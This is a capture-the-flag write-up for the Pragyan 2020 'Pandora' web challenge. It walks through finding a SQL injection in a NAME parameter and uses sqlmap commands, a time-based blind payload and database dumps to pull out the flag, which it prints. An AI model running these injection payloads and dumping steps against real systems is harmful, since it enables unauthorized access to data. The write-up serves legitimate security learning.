Pragyan 2020 - Pandora

Posted on mer. 26 février 2020 in CTF

Solved by: 7%

First solvers: nguyendqn
Jake in pandora needs to save Naʼvi from Human invasion. But he is not sure human`s army base`s locations.
Help him find those location so that he can take them down before they start their move.

link: http://ctf.pragyan.org:14000

We need to create an account with a username and password (admin123 here). When you get in, the webpage shows you that you don't have any message.

A quick test with the NAME param with ' OR 1=1 --' show all the message. Great! We found a SQL injection. Let's try to get all data with sqlmap.

Valid the injection

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"  
[...]
[11:49:19] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[...]
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: NAME (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: success=welcome&NAME=admin123' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND 'iTBY'='iTBY
---

Dump database

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" --dbs
[...]
[11:51:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:51:16] [INFO] retrieved: 2
[11:51:21] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[11:53:55] [INFO] retrieved: capture_the_flag
available databases [2]:
[*] capture_the_flag
[*] information_schema
[...]

Dump tables

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag --tables
[...]
[11:58:26] [INFO] retrieved: pandoralocations
[12:00:44] [INFO] retrieved: pandoramsg
[12:01:25] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg       |
| pandorausers     |
+------------------+

Dump data

$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag -T pandoralocations --dump
[...]
Database: capture_the_flag
Table: pandoralocations
[3 entries]
+-------+----------------------------------------+-----------+
| base  | latitude                               | longitude |
+-------+----------------------------------------+-----------+
| base1 | 10.0054 N                              | 45.0245E  |
| base2 | p_ctf{4vengers_455emb1e_0ne_l45t_t1me} | 56.0245e  |
| base3 | 45.9999 S                              | 66.04578W |
+-------+----------------------------------------+-----------+

YEAH! We got finally the flag : p_ctf{4vengers_455emb1e_0ne_l45t_t1me}.